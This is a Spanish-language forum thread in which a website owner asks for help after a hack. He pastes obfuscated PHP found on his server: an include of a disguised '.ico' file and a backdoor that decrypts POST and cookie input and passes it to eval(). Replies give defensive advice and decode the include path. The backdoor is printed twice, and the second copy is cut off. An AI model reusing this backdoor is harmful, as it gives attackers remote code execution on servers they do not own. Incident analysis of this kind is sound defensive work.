Me estan insertando archivos y codigos en mi pagina ¿Que hago?

  • Autor Autor krvaM
  • Fecha de inicio Fecha de inicio
krvaM

krvaM

Eta
Verificación en dos pasos activada
hola, hace unos dias me inseraton un href en mi index y cuando entrabas a mi pagina te redireccionaba a la pagina del hacker..

Ya quite el href y buscando encontre otros archivos que han "subido" o insertado no se como en mis carpetas de la web..
Que puedo hacer?


algunos de esos codigos estan aca:
PHP: 
<?php
/*4e4b4*/

@include "\x2fhom\x65/sp\x6ft/w\x65b/s\x70oti\x66ree\x2enet\x2fpub\x6cic_\x68tml\x2fcac\x68e/u\x73erf\x65eds\x2f108\x2ffav\x69con\x5f987\x329d.\x69co";

/*4e4b4*/

PHP: 
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['z2e3'] = "\x35\xd\x70\x38\x3d\x49\x41\x56\x2d\x22\x52\x37\x53\x31\x21\x7d\x67\x57\x3a\x3b\x59\x6b\x2c\x46\x7c\x6e\x30\x74\x5a\x54\x50\xa\x26\x72\x2e\x63\x58\x2b\x5d\x25\x27\x43\x62\x47\x4f\x9\x4c\x36\x6d\x2a\x28\x66\x2f\x64\x5b\x45\x4b\x71\x55\x51\x7a\x42\x5e\x69\x5c\x73\x6f\x4d\x79\x61\x4a\x48\x23\x65\x77\x44\x3f\x4e\x5f\x29\x34\x39\x20\x6c\x32\x3e\x24\x76\x78\x7b\x60\x33\x68\x75\x7e\x6a\x3c\x40";
$GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][47]] = $GLOBALS['z2e3'][35].$GLOBALS['z2e3'][92].$GLOBALS['z2e3'][33];
$GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]] = $GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][53];
$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][25];
$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]] = $GLOBALS['z2e3'][63].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][27];
$GLOBALS[$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][26]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][60].$GLOBALS['z2e3'][73];
$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][47]] = $GLOBALS['z2e3'][2].$GLOBALS['z2e3'][92].$GLOBALS['z2e3'][2].$GLOBALS['z2e3'][87].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][25];
$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][81]] = $GLOBALS['z2e3'][93].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][60].$GLOBALS['z2e3'][73];
$GLOBALS[$GLOBALS['z2e3'][95].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][0]] = $GLOBALS['z2e3'][42].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][73];
$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][84]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][27];
$GLOBALS[$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][84]] = $GLOBALS['z2e3'][25].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][81];
$GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]] = $GLOBALS['z2e3'][53].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][91];
$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][0]] = $_POST;
$GLOBALS[$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][0]] = $_COOKIE;
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][16], NULL);
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][83].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][65], 0);
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][48].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][88].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][88].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][93].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][73], 0);
@$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][84]](0);

$geb27a = NULL;
$k4aff4a = NULL;

$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][0]] = $GLOBALS['z2e3'][13].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][26];
global $b41aa95;

function db144363($geb27a, $hdf87)
{
    $x3dd23ce = "";

    for ($b35e8e=0; $b35e8e<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($geb27a);)
    {
        for ($q7aefd=0; $q7aefd<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($hdf87) && $b35e8e<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($geb27a); $q7aefd++, $b35e8e++)
        {
            $x3dd23ce .= $GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][47]]($GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]]($geb27a[$b35e8e]) ^ $GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]]($hdf87[$q7aefd]));
        }
    }

    return $x3dd23ce;
}

function nb6300a9($geb27a, $hdf87)
{
    global $b41aa95;

    return $GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]]($GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]]($geb27a, $b41aa95), $hdf87);
}

foreach ($GLOBALS[$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][0]] as $hdf87=>$e982916e3)
{
    $geb27a = $e982916e3;
    $k4aff4a = $hdf87;
}

if (!$geb27a)
{
    foreach ($GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][0]] as $hdf87=>$e982916e3)
    {
        $geb27a = $e982916e3;
        $k4aff4a = $hdf87;
    }
}

$geb27a = @$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][81]]($GLOBALS[$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][84]]($GLOBALS[$GLOBALS['z2e3'][95].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][0]]($geb27a), $k4aff4a));
if (isset($geb27a[$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][21]]) && $b41aa95==$geb27a[$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][21]])
{
    if ($geb27a[$GLOBALS['z2e3'][69]] == $GLOBALS['z2e3'][63])
    {
        $b35e8e = Array(
            $GLOBALS['z2e3'][2].$GLOBALS['z2e3'][87] => @$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][47]](),
            $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][87] => $GLOBALS['z2e3'][13].$GLOBALS['z2e3'][34].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][13],
        );
        echo @$GLOBALS[$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][26]]($b35e8e);
    }
    elseif ($geb27a[$GLOBALS['z2e3'][69]] == $GLOBALS['z2e3'][73])
    {
        eval($geb27a[$GLOBALS['z2e3'][53]]);
    }
    exit();
}
 
Analiza tu host a ver si contiene algun virus.

Al parecer las sentencias están encriptadas, no recuerdo donde realizaba ese tipo de encriptación. así podrías dar con la web de tu atacante.
 
Amigo, tu web esta encriptada ? quizas necesites mas seguridad. los hackers siempre van a existir 😕
 
LJGarban dijo:
Amigo, tu web esta encriptada ? quizas necesites mas seguridad. los hackers siempre van a existir 😕
Hacer clic para expandir...

Si claro, osea nada es imposible de hackear. Pero nose si esta encriptada, seguramente este muy desprotejida pero no tengo mucha idea sobre seguridad web por eso consultaba aqui.. :encouragement:
 
Hola [MENTION=21765]krvaM[/MENTION] , te aconsejo tomar las siguiente medidas:

* Cambiar usuarios y password FTP.
* Cambiar el password del server.
* En el caso de que tengas wordpress, (que es lo mas hackeable que ay) mira bien los usuarios que tienes agregados al blog, ya que de seguro te han inyectado una SHELL y de ahi se crea un usuario admin en el blog para poder manipularlo y/o inyectar una SHELL secundaria.

Con respecto al codigo que has puesto arriba:

CODIGO 1:
Insertar CODE, HTML o PHP: 
<?php 
/*4e4b4*/ 

@include "\x2fhom\x65/sp\x6ft/w\x65b/s\x70oti\x66ree\x2enet\x2fpub\x6cic_\x68tml\x2fcac\x68e/u\x73erf\x65eds\x2f108\x2ffav\x69con\x5f987\x329d.\x69co"; 

/*4e4b4*/

CODIGO 1 DESENCRIPTADO:

Insertar CODE, HTML o PHP: 
<?php /*4e4b4*/ @include "/home/spot/web/spotifree.net/public_html/cache/userfeeds/108/favicon_98729d.ico"; /*4e4b4*/

Ahi esta llamando al archivo favicon_98729.ico que posiblemente tenga algun codigo oculto dentro de ese archivo.



CODIGO 2:
Insertar CODE, HTML o PHP: 
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['z2e3'] = "\x35\xd\x70\x38\x3d\x49\x41\x56\x2d\x22\x52\x37\x53\x31\x21\x7d\x67\x57\x3a\x3b\x59\x6b\x2c\x46\x7c\x6e\x30\x74\x5a\x54\x50\xa\x26\x72\x2e\x63\x58\x2b\x5d\x25\x27\x43\x62\x47\x4f\x9\x4c\x36\x6d\x2a\x28\x66\x2f\x64\x5b\x45\x4b\x71\x55\x51\x7a\x42\x5e\x69\x5c\x73\x6f\x4d\x79\x61\x4a\x48\x23\x65\x77\x44\x3f\x4e\x5f\x29\x34\x39\x20\x6c\x32\x3e\x24\x76\x78\x7b\x60\x33\x68\x75\x7e\x6a\x3c\x40"; 
$GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][47]] = $GLOBALS['z2e3'][35].$GLOBALS['z2e3'][92].$GLOBALS['z2e3'][33]; 
$GLOBALS[$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][26]] = $GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][53]; 
$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][25]; 
$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]] = $GLOBALS['z2e3'][63].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][27]; 
$GLOBALS[$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][26]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][60].$GLOBALS['z2e3'][73]; 
$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][47]] = $GLOBALS['z2e3'][2].$GLOBALS['z2e3'][92].$GLOBALS['z2e3'][2].$GLOBALS['z2e3'][87].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][25]; 
$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][81]] = $GLOBALS['z2e3'][93].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][60].$GLOBALS['z2e3'][73]; 
$GLOBALS[$GLOBALS['z2e3'][95].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][0]] = $GLOBALS['z2e3'][42].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][73]; 
$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][84]] = $GLOBALS['z2e3'][65].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][27]; 
$GLOBALS[$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][84]] = $GLOBALS['z2e3'][25].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][81]; 
$GLOBALS[$GLOBALS['z2e3'][21].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13]] = $GLOBALS['z2e3'][53].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][91]; 
$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][0]] = $_POST; 
$GLOBALS[$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][26].$GLOBALS['z2e3'][0]] = $_COOKIE; 
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][16], NULL); 
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][83].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][16].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][33].$GLOBALS['z2e3'][65], 0); 
@$GLOBALS[$GLOBALS['z2e3'][83].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][13]]($GLOBALS['z2e3'][48].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][88].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][88].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][93].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][66].$GLOBALS['z2e3'][25].$GLOBALS['z2e3'][78].$GLOBALS['z2e3'][27].$GLOBALS['z2e3'][63].$GLOBALS['z2e3'][48].$GLOBALS['z2e3'][73], 0); 
@$GLOBALS[$GLOBALS['z2e3'][57].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][84]](0); 

$geb27a = NULL; 
$k4aff4a = NULL; 

$GLOBALS[$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][0]] = $GLOBALS['z2e3'][13].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][53].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][47].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][35].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][8].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][11].$GLOBALS['z2e3'][69].$GLOBALS['z2e3'][3].$GLOBALS['z2e3'][81].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][73].$GLOBALS['z2e3'][0].$GLOBALS['z2e3'][26]; 
global $b41aa95; 

function db144363($geb27a, $hdf87) 
{ 
    $x3dd23ce = ""; 

    for ($b35e8e=0; $b35e8e<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($geb27a);) 
    { 
        for ($q7aefd=0; $q7aefd<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($hdf87) && $b35e8e<$GLOBALS[$GLOBALS['z2e3'][51].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][42].$GLOBALS['z2e3'][91].$GLOBALS['z2e3'][84].$GLOBALS['z2e3'][80].$GLOBALS['z2e3'][13].$GLOBALS['z2e3'][35]]($geb27a); $q7aefd++, $b35e8e++) 
        { 
